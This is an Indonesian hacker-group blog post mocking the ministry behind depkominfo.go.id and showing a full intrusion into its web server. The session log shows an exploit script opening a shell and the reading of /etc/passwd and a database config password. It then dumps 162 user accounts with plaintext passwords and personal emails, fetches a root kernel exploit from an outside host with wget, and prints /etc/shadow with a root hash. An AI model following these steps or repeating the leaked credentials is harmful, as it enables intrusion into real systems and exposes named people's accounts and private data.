Main » 2011 » May » 26 » Depkominfo POC gaining server access
7:45 AM
Depkominfo POC gaining server access
Kenapa depkominfo.go.id yg menjadi target?
Silakan kunjungi link http://goo.gl/sEwEa dan baca baik²
sebelum kalian merasa kebakaran jenggot karena situs kalian
di hack dan mencoba menangkap pelakunya, ada baiknya kalian
berkaca pada diri sendiri, benahi dahulu situsnya.
Namun kenyataannya kalian terlalu malas untuk membenahi
apa yg kalian miliki dan selalu ingin melakukan/terlihat
yg terhebat di depan publik, no.. you're not!
Kami YOGYACARDERLINK dengan senang hati memberikan kalian
sebuah _FREE_FULL_SECURITY_AUDIT_ agar kalian semakin
terlihat hebat di hadapan publik
Well, we gonna have fun now :)
Letz begin...
[v3n0m@localhost ~]$ cd pwned
[v3n0m@localhost pwned]$ perl depkominfo.pl -h 114.31.243.136 -p 6666
[+] connecting target 114.31.243.136:6666
[+] exploiting in progress...
[+] injecting a backdoor
[!] w00t! yOu g0t shell!
Warning: forward host lookup failed for ip-243-136.platinum.net.id: h_errno 11004: NO_DATA
ip-243-136.platinum.net.id [114.31.243.136] 6666 (?) open
$ pwd; id; uname -a
/var/www/html/
uid=48(apache) gid=48(apache) groups=48(apache)
Linux system.clearos.lan 2.6.18-194.8.1.v5PAE #1 SMP Thu Jul 15 02:01:47 EDT 2010 i686 i686 i386 GNU/Linux
$ w
0:59:13 up 13 days, 17:19, 1 user, load average: 0.16, 0.26, 0.26
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
clearcon tty1 - 08May11 13days 0.00s 0.00s -bash8
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
clamav:x:46:46:Clam AntiVirus:/tmp:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
suva:x:100:101:Suva:/var/lib/suva:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
webconfig:x:101:102:Webconfig:/var/webconfig:/bin/false
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
kolab:x:414:414::/var/lib/kolab:/sbin/nologin
clearconsole:x:415:99:ClearOS Console:/var/lib/clearconsole:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
flexshare:x:351:351::/var/flexshare:/sbin/nologin
$ ls -la
total 3504
drwxrwxr-x 20 flexshare allusers 4096 May 13 19:24 .
drwxr-xr-x 8 root root 4096 May 4 02:48 ..
-rw-rw-r-- 1 admin allusers 48 May 13 19:32 .htaccess
drwxrwxr-x 2 admin allusers 4096 May 4 03:05 _old
drwxrwxr-x 3 admin allusers 4096 May 4 03:05 _test
drwxrwxr-x 5 admin allusers 4096 May 4 03:07 admin
drwxrwxr-x 2 admin allusers 4096 May 13 19:11 ajax
drwxrwxr-x 13 admin allusers 4096 May 4 03:07 aseansummit
-rw-rw-r-- 1 admin allusers 107 May 4 18:03 asu.php
-rw-rw-r-- 1 admin allusers 10474 May 3 16:24 audio.php
drwxrwxr-x 8 admin allusers 4096 May 13 19:11 captcha
-rw-rw-r-- 1 admin allusers 14865 May 3 16:24 content.php
drwxrwxr-x 3 admin allusers 4096 May 13 19:11 css
-rw-rw-r-- 1 admin allusers 27656 May 3 16:24 detail.php
-rw-rw-r-- 1 admin allusers 27353 May 3 16:24 details.php
-rw-rw-r-- 1 admin allusers 5468 May 3 16:24 download.php
-rw-rw-r-- 1 admin allusers 221291 May 3 16:24 downloads.log
-rw-rw-r-- 1 admin allusers 3663 May 16 12:06 features.php
-rw-rw-r-- 1 admin allusers 91 May 3 16:24 forum.php
-rw-rw-r-- 1 admin allusers 2572 May 3 16:24 foto.php
-rw-rw-r-- 1 admin allusers 53 May 3 16:24 google438b785fad1f6218.html
-rw-rw-r-- 1 admin allusers 2161 May 3 16:24 guestbook.php
-rw-rw-r-- 1 admin allusers 27695 May 3 16:24 home.php
-rw-rw-r-- 1 admin allusers 27284 May 3 16:24 homez.php
drwxrwxr-x 4 admin allusers 4096 May 4 03:09 images
-rw-rw-r-- 1 admin allusers 2852 May 3 16:29 inc.function.php
-rw-rw-r-- 1 admin allusers 1407 May 3 16:29 inc.global.php
-rw-rw-r-- 1 admin allusers 3762 May 3 16:24 indeks_av.php
-rw-rw-r-- 1 admin allusers 5449 May 3 16:24 indeks_berita.php
-rw-rw-r-- 1 admin allusers 894 May 3 16:24 indeks_links.php
-rw-rw-r-- 1 admin allusers 1578 May 3 16:24 indeks_pic.php
-rw-rw-r-- 1 admin allusers 1257 May 3 16:24 indeks_psa.php
-rw-rw-r-- 1 admin allusers 9458 May 3 16:24 index.php
drwxrwxr-x 7 admin allusers 4096 May 13 19:12 lib
drwxrwxrwx 40 admin allusers 4096 May 4 11:55 mc
drwxrwxr-x 10 admin allusers 4096 May 3 16:18 mcms
drwxrwxrwx 14 admin allusers 4096 May 22 08:22 media
drwxrwxr-x 7 admin allusers 4096 May 3 16:18 monitoring
-rw-rw-r-- 1 admin allusers 20909 May 3 16:24 news.php
-rw-rw-r-- 1 admin allusers 23644 May 3 16:24 news_0.php
drwxrwxr-x 6 admin allusers 4096 May 13 19:16 portal_bip
-rw-rw-r-- 1 admin allusers 2933404 May 3 16:24 portal_bip.sql
-rw-rw-r-- 1 admin allusers 5564 May 3 16:24 print.php
-rw-rw-r-- 1 admin allusers 4016 May 3 16:24 product.php
-rw-rw-r-- 1 admin allusers 15110 May 3 16:24 profil.php
-rw-rw-r-- 1 admin allusers 23 May 3 16:24 robots.txt
drwxrwxr-x 2 admin allusers 4096 May 3 16:18 rss
-rw-rw-r-- 1 admin allusers 3650 May 3 16:24 search.php
drwxrwxr-x 2 admin allusers 4096 May 3 16:18 sessions
drwxrwxr-x 3 admin allusers 4096 May 6 09:39 speed
-rw-rw-r-- 1 admin allusers 1964 May 3 16:24 test.php
drwxrwxr-x 13 admin allusers 4096 May 10 13:31 ukp4
-rw-rw-r-- 1 admin allusers 7502 May 3 16:24 video.php
-rw-rw-r-- 1 admin allusers 263 May 3 16:24 y_key_3eadca2e869d14f3.html
$ head index.php
<?php
include_once('inc.global.php');
include_once('inc.function.php');
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="robots" content="INDEX, FOLLOW"/>
<meta name="y_key" content="10e3a45dfda257b8" />
<meta name="description" content="" />
$ tail inc.global.php
define('DB_HOST', 'localhost');
define('DB_USER', 'root');
define('DB_PASS', 'xxxxxxxxxqwe');
define('DB_NAME', 'portal_bip');
$conn = mysql_connect(DB_HOST, DB_USER, DB_PASS) or die(mysql_error());
mysql_select_db(DB_NAME);
mysql_query("SET lc_time_names = 'id_ID'");
?>
$ mysql -u root -p
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 156556
Server version: 5.0.77 Source distribution
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| newsroom_ukp4 |
| portal_bip |
| test |
+--------------------+
5 rows in set (0.00 sec)
mysql> use portal_bip
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------------+
| Tables_in_portal_bip |
+----------------------+
| level |
| location |
| maxnews |
| mc_album |
| mc_image |
| mc_news |
| mc_update |
| media_center |
| office_site |
| subcategory |
| t_forum_category |
| t_forum_post |
| t_forum_topic |
| t_forum_user |
| tbanner |
| tcategory |
| tcomment |
| tcontent |
| tevent |
| tguestbook |
| theadline |
| timagealbum |
| timagepicture |
| tlevel |
| tlink |
| tmedia |
| tmemberlog |
| tmenu |
| tnews |
| tnews_category |
| tnews_content |
| tnews_deleted |
| tnews_lock |
| tpoll |
| tpoll_choice |
| tproduct |
| tproduct_list |
| tpsa |
| tpubliclog |
| tsoal |
| tsoal_log |
| usergroup |
| users |
| vmaxnews |
+----------------------+
44 rows in set (0.00 sec)
mysql> show columns from users;
+-------------+--------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-------------+--------------+------+-----+---------+----------------+
| autoNo | int(11) | NO | PRI | NULL | auto_increment |
| idGroup | int(11) | NO | | NULL | |
| levelId | int(11) | NO | | NULL | |
| districtId | int(11) | NO | | NULL | |
| loginId | varchar(50) | NO | | NULL | |
| password | varchar(50) | NO | | NULL | |
| username | text | NO | | NULL | |
| birthDate | date | NO | | NULL | |
| photo | varchar(100) | NO | | NULL | |
| address | text | NO | | NULL | |
| phone | varchar(100) | NO | | NULL | |
| mob_phone | varchar(20) | NO | | NULL | |
| email | varchar(100) | NO | | NULL | |
| userBio | text | NO | | NULL | |
| createdBy | varchar(100) | NO | | NULL | |
| createdDate | datetime | NO | | NULL | |
| updatedBy | varchar(100) | NO | | NULL | |
| updatedDate | datetime | NO | | NULL | |
+-------------+--------------+------+-----+---------+----------------+
18 rows in set (0.00 sec)
mysql> select loginId,password,email from users;
+-----------------+----------------+------------------------------------------------+
| loginId | password | email |
+-----------------+----------------+------------------------------------------------+
| admin | xxxxxxxxxqwe!@# | admin@depkominfo.go.id |
| reporter | firmans | firman.kominfo@gmail.com |
| mcenrekang | xxxxxxxxx | |
| mcbima | xxxxxxxxx | |
| mcjeneponto | xxxxxxxxx | |
| mcmakassar | xxxxxxxxx | |
| mcbitung | xxxxxxxxx | |
| mcbiaknumfor | xxxxxxxxx | |
| mcsultenggara | xxxxxxxxx | heryati82@gmail.com |
| mcprovgorontalo | angkatan1 | tanthy.ganra@gmail.com, tanthy_humas@yahoo.com |
| apoet | xxxxxxxxx | apoet@apoet.com |
| choirul | xxxxxxxxx456 | choirul.zone@gmail.com |
| vina | xxxxxxxxx456 | vina_falah@hotmail.com |
| redpel | xxxxxxxxx456 | redpel@redpel.com |
| redaktur | xxxxxxxxx456 | redaktur@email.com |
| mcbanten | p3nd3k4rb4nt3n | infopublik@bantenprov.go.id |
| ahmed | xxxxxxxxx456 | |
| repbanten | xxxxxxxxxqwe!@# | |
| mcyogya | xxxxxxxxxqwe!@# | |
| levi | jator | syahrina.pahlevi@yahoo.co.uk |
| r_mustakim | POLHUKAM | r.mustakim@ymail.com |
| mcaceh | xxxxxxxxx4 | |
| baheramsyah | amelia | baeng_17@yahoo.com |
| masfardi | xxxxxxxxx | fardi_55@yahoo.co.id |
| yudirahmat | R4hm4t | yudi62@yahoo.com, yudirahmat@gmail.com |
| astra | 1104 | astrakominfo@yahoo.co.id |
| Tomo | sutomosuaidah | tomo_1531@yahoo.co.id |
| azwar | 100160 | azw4r_bdg@yahoo.co.id |
| g_suranto | xxxxxxxxx | suranto_g@yahoo.co.id |
| goenawan | Go3nawan | rgoenawan@yahoo.com |
| sinar_goro | xxxxxxxxx | g1g1t11@yahoo.co.uk, nakedra@gmail.com |
| eka_yona | 4534638 | gagak_2004@yahoo.com |
| firmansyah | fuck | firman.kominfo@gmail.com |
| wandi | jakartaxxxxxxxxx | wandibip@gmail.com |
| ismadi | Belvin45 | ismadi.amrin@yahoo.co.id |
| juliah | iloveumom61 | julia_ahad@yahoo.com |
| dian_t | xxxxxxxxx | enit_13@yahoo.co.id |
| bakohumas | xxxxxxxxx456 | |
| ahmed | xxxxxxxxx | ahmedsw@hotmail.com |
| agus_s | asb | agussbudiawan@yahoo.com |
| gusti | cecile | goes_dry@yahoo.com |
| tobari | xxxxxxxxx | |
| soemarno | xxxxxxxxx | soemarno52@yahoo.com |
| nusantara | xxxxxxxxx | |
| report | xxxxxxxxx | |
| mcpariaman | 13579 | |
| mc_agam | xxxxxxxxx4 | |
| mcbengkulu | xxxxxxxxx | |
| mcpalembang | inf0rk0m21 | febrianazhar@yahoo.com |
| mcsingkawang | xxxxxxxxx | |
| mcsabang | xxxxxxxxx | |
| mckuburaya | xxxxxxxxx | |
| mc_museumtmii | muspen2004 | yuri.a.waspodo@gmail.com |
| mckalteng | amadeo | pey_budiman@yahoo.co.id |
| mckotajambi | xxxxxxxxx | |
| mcpekanbaru | xxxxxxxxx | |
| mcpelalawan | xxxxxxxxx | |
| mckaro | kabkaro2011 | kominfo@karokab.go.id |
| mcbatanghari | xxxxxxxxx | |
| mctulangbawang | 140784 | skin_forever2000@yahoo.com |
| mcmusibanyuasin | m1u2b3a4bisa | kominfomuba@gmail.com |
| mcdeliserdang | xxxxxxxxx | |
| mcagam | MC AGAM | agam.mediacenter@gmail.com |
| mcnunukan | xxxxxxxxx | |
| mctanahdatar | xxxxxxxxx | |
| mckalsel | xxxxxxxxx | |
| mcsumbar | xxxxxxxxx | |
| mcmetro | xxxxxxxxx | |
| mcmuaraenim | k0M1nf0 | |
| mckutai | xxxxxxxxx | |
| mcbandaaceh | xxxxxxxxx | |
| mcsampit | xxxxxxxxx | |
| mc_kabgorontalo | xxxxxxxxx | |
| mc_provjambi | xxxxxxxxx | |
| mc_provbabel | xxxxxxxxx | |
| mcbanjarmasin | xxxxxxxxx | |
| mcbatam | xxxxxxxxx | |
| mcbalikpapan | xxxxxxxxx | |
| mcpadang | 13579 | |
| mc_kabindramayu | xxxxxxxxx | humas@indramayukab.go.id |
| mc_karangasem | xxxxxxxxx | |
| s.pahlevi | jatoreko | syahrina.pahlevi@yahoo.co.uk |
| mcparepare | xxxxxxxxx | |
| mcsorong | xxxxxxxxx | |
| mcbulukumba | xxxxxxxxx | |
| mcmatenggara | xxxxxxxxx | |
| mcpolman | xxxxxxxxx | |
| mcmanokwari | xxxxxxxxx | |
| mcbolaang | xxxxxxxxx | |
| mcbelu | xxxxxxxxx | |
| mcsumbawabar | xxxxxxxxx | |
| mcsulteng | xxxxxxxxx | |
| mcmaluku | xxxxxxxxx | |
| mcntt | xxxxxxxxx | |
| mcpapua | xxxxxxxxx | |
| mcttu | xxxxxxxxx | |
| mcmanado | xxxxxxxxx | |
| mcposo | xxxxxxxxx | |
| mcmerauke | xxxxxxxxx | |
| mcsinjai | xxxxxxxxx | |
| mckuningan | xxxxxxxxx | |
| mcdemak | xxxxxxxxx | |
| mcsurakarta | xxxxxxxxx | |
| mcbekasi | xxxxxxxxx | |
| mcmalang | xxxxxxxxx | |
| mcbandung | xxxxxxxxx | |
| mcblitar | xxxxxxxxx | |
| mcpacitan | xxxxxxxxx | |
| mckarangasem | xxxxxxxxx | |
| mcdkijakarta | xxxxxxxxx | |
| mcjatim | xxxxxxxxx | |
| mctasik | xxxxxxxxx | |
| mcsumenep | xxxxxxxxx | |
| mcsubang | xxxxxxxxx | |
| mckulonprogro | xxxxxxxxx | |
| mcbogorkab | xxxxxxxxx | |
| mcsidoarjokab | xxxxxxxxx | |
| mctangerangkab | xxxxxxxxx | |
| mcpekalongan | xxxxxxxxx | |
| mccirebonkab | xxxxxxxxx | |
| mcblora | xxxxxxxxx | |
| mcjember | xxxxxxxxx | |
| mckarawang | xxxxxxxxx | |
| mccianjur | xxxxxxxxx | |
| mcbojonegoro | xxxxxxxxx | |
| mcmagetan | xxxxxxxxx | |
| mckaranganyar | xxxxxxxxx | |
| mcbali | xxxxxxxxx | |
| mcjateng | xxxxxxxxx | |
| mcsurabaya | xxxxxxxxx | |
| mcsalatiga | xxxxxxxxx | |
| mcsemarang | xxxxxxxxx | |
| mcmadiun | xxxxxxxxx | |
| mccilacap | xxxxxxxxx | |
| mcbuleleng | xxxxxxxxx | |
| mcgkidul | xxxxxxxxx | |
| mcbadung | xxxxxxxxx | |
| mckwarnas | xxxxxxxxx | |
| mcmuslimatnu | xxxxxxxxx | |
| mcsumut | xxxxxxxxx | |
| mckepri | xxxxxxxxx | |
| mckotimkab | xxxxxxxxx | |
| mcmatengbakab | xxxxxxxxx | |
| mth | mth | mthidayat@depkominfo.go.id |
| yusri | xxxxxxxxx | |
| mcprovgorontalo | xxxxxxxxx | |
| mckaltim | xxxxxxxxx | |
| mckalbar | xxxxxxxxx | |
| mcprovbabel | xxxxxxxxx | |
| mcprovbengkulu | xxxxxxxxx | |
| mcjabar | xxxxxxxxx | |
| mcyogya | munsif | msa@jogjaprov.go.id |
| mclampung | l4mpun6 | |
| mcmalut | xxxxxxxxx | |
| mcsulbar | xxxxxxxxx | |
| mcsulsel | xxxxxxxxx | |
| mcsulut | martadinata35 | yennymaegoda@yahoo.co.id |
| mcnad | xxxxxxxxx | |
| mcprovriau | dkipdemc | muslimalai@yahoo.com |
| mcntt | xxxxxxxxx | |
| mcntb | xxxxxxxxx | |
| pkl | xxxxxxxxx4 | |
+-----------------+----------------+------------------------------------------------+
162 rows in set (0.00 sec)
mysql> exit;
Bye
[~] Plaintext Password??
Nice.. Sebuah IT team professionals yg katanya secara
teknis mudah untuk menangkap seorang defacer melalui
IP address ternyata menggunakan plaintext untuk passwordnya
Hebat! Sungguh Hebat! Bruakakakakakakakakak *asli ngakak*
[~] Menyenangkan! Tapi kami ingin lebih dari sekedar bersenang-senang..
Mari kita mulai ke inti dari system ini :)
$ uname -a
Linux system.clearos.lan 2.6.18-194.8.1.v5PAE #1 SMP Thu Jul 15 02:01:47 EDT 2010 i686 i686 i386 GNU/Linux
$ wget http://www.flaconline.com/tmp/r00tkernelexpl0it
--2011-05-23 06:56:20-- http://www.flaconline.com/tmp/r00tkernelexpl0it
Resolving www.flaconline.com... 74.220.215.58
Connecting to www.flaconline.com|74.220.215.58|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17200 (17K) [text/plain]
Saving to: `r00tkernelexpl0it'
100%[=========================================================================================================================================>] 17,200 87.6K/s in
0.3s
06:56:20 (87.6 KB/s) - `r00tkernelexpl0it' saved [17200/17200]
$ chmod +x r00tkernelexpl0it; ./r00tkernelexpl0it
[+] YOGYACARDERLINK 0day kernel 3xpl0it
[+] Kernel: 2.6.18-194.8.1.v5PAE
[-----------------------------------]
[+] Load da Payload
[!] Triggering r00t sh3ll setuid=0
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# cat /etc/shadow
root:$1$FK.0UXSW$KnHZgMQ2y.K8JzlLvbioz0:15097:0:99999:7:::
bin:*:15097:0:99999:7:::
daemon:*:15097:0:99999:7:::
adm:*:15097:0:99999:7:::
lp:*:15097:0:99999:7:::
sync:*:15097:0:99999:7:::
shutdown:*:15097:0:99999:7:::
halt:*:15097:0:99999:7:::
mail:*:15097:0:99999:7:::
news:*:15097:0:99999:7:::
uucp:*:15097:0:99999:7:::
operator:*:15097:0:99999:7:::
games:*:15097:0:99999:7:::
gopher:*:15097:0:99999:7:::
ftp:*:15097:0:99999:7:::
nobody:*:15097:0:99999:7:::
clamav:!!:15097:0:99999:7:::
mysql:!!:15097:0:99999:7:::
pcap:!!:15097:0:99999:7:::
nscd:!!:15097:0:99999:7:::
vcsa:!!:15097:0:99999:7:::
ldap:!!:15097:0:99999:7:::
ntp:!!:15097:0:99999:7:::
dbus:!!:15097:0:99999:7:::
suva:!!:15097:0:99999:7:::
apache:!!:15097:0:99999:7:::
webconfig:!!:15097:0:99999:7:::
sshd:!!:15097:0:99999:7:::
avahi:!!:15097:0:99999:7:::
kolab:!!:15097:0:99999:7:::
clearconsole:!!:15097:0:99999:7:::
haldaemon:!!:15097:0:99999:7:::
flexshare:!!:15097:0:99999:7:::
sh-3.2# cat .bash_history
cd /var/tmp
wget http://prdownloads.sourceforge.net/webadmin/webmin-1.500-1.noarch.rpm
rpm -Uvh webmin-1.500-1.noarch.rpm
cd /var/tmp
wget http://prdownloads.sourceforge.net/webadmin/webmin-1.500-1.noarch.rpm
rpm -Uvh webmin-1.500-1.noarch.rpm
cd /var/tmp
wget http://prdownloads.sourceforge.net/webadmin/webmin-1.500-1.noarch.rpm
wget http://sourceforge.net/projects/webadmin/files/webmin/1.500/webmin-1.500-1.noarch.rpm/download
ping google.com
ping google.com
ifconfig
ping google.com
ping 10.10.10.1
ping yahoo.com
ping yahoo.com
ping yahoo.com
ping yahoo.com
ping yahoo.com
ping yahoo.com
ping yahoo.com
ping yahoo.com
ping google.com
cd /var/tmp
wget http://prdownloads.sourceforge.net/webadmin/webmin-1.500-1.noarch.rpm
rpm -Uvh webmin-1.500-1.noarch.rpm
yum install bzip2-devel db4-devel expat-devel gmp-devel aspell-devel httpd-devel libjpeg-develpam-devel sqlite-devel pcre-devel readline-devel libc-client-devel cyrus-sasl-devel openldap-devel mysql-devel postgresql-devel unixODBC-devel libxml2-devel net-snmp-devel libxslt-devel libxml2-devel ncurses-devel gd-devel freetype-devel pam-devel
rpmbuild --rebuild php-5.2.9-2.i386.rpm
yum install bzip2-devel db4-devel expat-devel gmp-devel aspell-devel httpd-devel libjpeg-develpam-devel sqlite-devel pcre-devel readline-devel libc-client-devel cyrus-sasl-devel openldap-devel mysql-devel postgresql-devel unixODBC-devel libxml2-devel net-snmp-devel libxslt-devel libxml2-devel ncurses-devel gd-devel freetype-devel pam-devel
wget ftp://starlane.gotdns.org/php-5.2.9/ClarkConnect5.0/php-5.2.9-2.i386.rpm
mkdir /root/download/php52/
cd /root/download/php52/
wget .r ftp://starlane.gotdns.org/php-5.2.9/ClearOS5.1/
cd /root/download/php52/starlane.gotdns.org/php-5.2.9/ClearOS5.1
wget ftp://download.clearfoundation.com/community/timb80/php-5.2.9/ClearOS5.1/*.rpm
yum localinstall --nogpgcheck php-*
mkdir /root/download/php52/
wget .r ftp://starlane.gotdns.org/php-5.2.9/ClearOS5.1/
wget ftp://download.clearfoundation.com/community/timb80/php-5.2.9/ClearOS5.1/*.rpm
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
ping yahoo.com
ping 10.10.10.1
ping bipnewsroom.info
ifconfgi
ifconfig
yum install php-gd
ping 10.10.10.1
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
yum install php-gd
mkdir /root/downloads/php52
cd /root/downloads/php52
wget ftp://download.clearfoundation.com/community/timb80/php-5.2.9/ClearOS5.1/*.rpm
wget ftp://download.clearfoundation.com/community/timb80/php-5.2.9/ClearOS5.1/extras/php-mcr*.rpm
yum install --nogpgcheck php-*
yum update
yum
yum update
ping google.com
sh-3.2# cd home/
sh-3.2# ls -la
total 20
drwxr-xr-x 3 root root 4096 May 4 02:56 .
drwxr-xr-x 21 root root 4096 May 8 15:40 ..
drwxr-xr-x 2 admin allusers 4096 May 4 02:56 admin
sh-3.2# cd admin/
sh-3.2# ls -la
total 12
drwxr-xr-x 2 admin allusers 4096 May 4 02:56 .
drwxr-xr-x 3 root root 4096 May 4 02:56 ..
sh-3.2# cd /var/
sh-3.2# ls -la
total 188
drwxr-xr-x 24 root root 4096 May 9 01:24 .
drwxr-xr-x 21 root root 4096 May 8 15:40 ..
drwxr-xr-x 7 root root 4096 May 4 02:46 cache
drwxr-xr-x 3 root root 4096 May 4 02:45 db
drwxr-xr-x 3 root root 4096 May 4 02:46 empty
drwxr-xr-x 4 root root 4096 May 4 02:48 flexshare
drwxr-xr-x 2 root root 4096 Oct 23 2009 ftp
drwxr-xr-x 2 root root 4096 Jul 13 2010 games
drwxr-xr-x 35 root root 4096 May 4 02:51 lib
drwxr-xr-x 2 root root 4096 Jul 13 2010 local
drwxrwxr-x 8 root lock 4096 May 23 04:02 lock
drwxr-xr-x 9 root root 4096 May 23 04:02 log
lrwxrwxrwx 1 root root 10 May 4 02:43 mail -> spool/mail
drwxr-xr-x 2 root root 4096 Jul 13 2010 nis
drwxr-xr-x 2 root root 4096 Jul 13 2010 opt
drwxr-xr-x 2 root root 4096 Jul 13 2010 preserve
drwxr-xr-x 21 root root 4096 May 23 06:25 run
drwxr-xr-x 5 root root 4096 May 4 02:53 samba
drwxr-xr-x 6 root root 4096 May 4 02:46 spool
drwxr-xr-x 3 root root 4096 May 9 01:24 state
drwxrwxrwt 2 root root 4096 May 8 15:41 tmp
drwxr-xr-x 13 root root 4096 May 4 02:53 webconfig
drwx------ 2 root bin 4096 May 8 15:27 webmin
drwxr-xr-x 8 root root 4096 May 4 02:48 www
drwxr-xr-x 2 root root 4096 Jul 13 2010 yp
sh-3.2# cd webmin/; ls -la
total 136
drwx------ 2 root bin 4096 May 8 15:27 .
drwxr-xr-x 24 root root 4096 May 9 01:24 ..
-rwx------ 1 root root 0 May 23 06:25 blocked
-rw-r--r-- 1 root root 14477 May 23 06:24 miniserv.error
-rw------- 1 root root 90817 May 23 06:32 miniserv.log
-rw-r--r-- 1 root root 5 May 8 15:41 miniserv.pid
-rwx------ 1 root root 0 May 3 16:16 sessiondb.dir
-rwx------ 1 root root 1024 May 23 06:32 sessiondb.pag
-rw------- 1 root root 3480 May 4 18:17 webmin.log
sh-3.2# cat webmin.log
1304415255.22202.0 [03/May/2011 16:34:15] root 6c4e48f689104efab8a1b640ba464823 10.10.10.30 apache create_virt.cgi "virt" "create" "*" adddir='1' addr='www.infopublik.depkominfo.go.id' addr_def='2' clone='192' file='' fmode='0' listen='1' name_def='1' nv='1' port='' port_mode='0' root=''
1304415333.23302.0 [03/May/2011 16:35:33] root c7a1c258254bf0197916d38e193ab9f4 10.10.10.1 shell index.cgi "run" "-" "-" cmd='chmod -R 777 /var/www/html/infopublik.depkominfo.go.id/lib/jscripts/tiny_mce/plugins/ajaxfilemanager/session'
1304415356.23301.0 [03/May/2011 16:35:56] root c7a1c258254bf0197916d38e193ab9f4 10.10.10.1 shell index.cgi "run" "-" "-" cmd='chmod -R 777 /var/www/virtual/infopublik.depkominfo.go.id/media'
1304415372.23315.0 [03/May/2011 16:36:12] root c7a1c258254bf0197916d38e193ab9f4 10.10.10.1 shell index.cgi "run" "-" "-" cmd='chmod -R 777 /var/www/html/lib/jscripts/tiny_mce/plugins/ajaxfilemanager/session'
1304415390.22028.0 [03/May/2011 16:36:30] root c7a1c258254bf0197916d38e193ab9f4 10.10.10.1 shell index.cgi "run" "-" "-" cmd='chmod -R 777 /var/www/html/lib/jscripts/tiny_mce/plugins/ajaxfilemanager/session'
1304415414.22225.0 [03/May/2011 16:36:54] root 6c4e48f689104efab8a1b640ba464823 10.10.10.30 apache delete_vservs.cgi "virts" "delete" "1"
1304415416.25970.0 [03/May/2011 16:36:56] root c7a1c258254bf0197916d38e193ab9f4 10.10.10.1 shell index.cgi "run" "-" "-" cmd='chmod 777 /var/www/media'
1304415436.26566.0 [03/May/2011 16:37:16] root c7a1c258254bf0197916d38e193ab9f4 10.10.10.1 shell index.cgi "run" "-" "-" cmd='chmod 777 /var/www/html/media'
1304415741.26691.0 [03/May/2011 16:42:21] root c7a1c258254bf0197916d38e193ab9f4 10.10.10.1 shell index.cgi "run" "-" "-" cmd='chmod 777 /var/www/html/media'
1304415777.31567.0 [03/May/2011 16:42:57] root c7a1c258254bf0197916d38e193ab9f4 10.10.10.1 shell index.cgi "run" "-" "-" cmd='chmod 777 /var/www/html/media/'
1304415847.616.0 [03/May/2011 16:44:07] root c7a1c258254bf0197916d38e193ab9f4 10.10.10.1 shell index.cgi "run" "-" "-" cmd='chmod -R 777 /var/www/html/lib/jscripts/tiny_mce/plugins/ajaxfilemanager/session'
1304415877.811.0 [03/May/2011 16:44:37] root c7a1c258254bf0197916d38e193ab9f4 10.10.10.1 shell index.cgi "run" "-" "-" cmd='chmod -R 777 /var/www/html/media/'
1304415944.2250.0 [03/May/2011 16:45:44] root c7a1c258254bf0197916d38e193ab9f4 10.10.10.1 phpini save_manual.cgi "manual" "/etc/php.ini" "-"
1304416012.3951.0 [03/May/2011 16:46:52] root c7a1c258254bf0197916d38e193ab9f4 10.10.10.1 apache stop.cgi "stop" "-" "-"
1304416018.3949.0 [03/May/2011 16:46:58] root c7a1c258254bf0197916d38e193ab9f4 10.10.10.1 apache start.cgi "start" "-" "-"
1304416058.4026.0 [03/May/2011 16:47:38] root c7a1c258254bf0197916d38e193ab9f4 10.10.10.1 phpini save_manual.cgi "manual" "/etc/php.ini" "-"
1304484179.14835.0 [04/May/2011 11:42:59] root 6b1cd655354f7d5d8d73995e5ca5f99f 10.10.10.1 shell index.cgi "run" "-" "-" cmd='chmod -R 777 /var/www/html/mc/'
1304497840.31073.0 [04/May/2011 15:30:40] root 6b1cd655354f7d5d8d73995e5ca5f99f 10.10.10.1 phpini save_manual.cgi "manual" "/etc/php.ini" "-"
1304507860.27552.0 [04/May/2011 18:17:40] root 78075a8e523cd32f02d1478294b05a09 10.10.10.1 phpini save_manual.cgi "manual" "/etc/php.ini" "-"
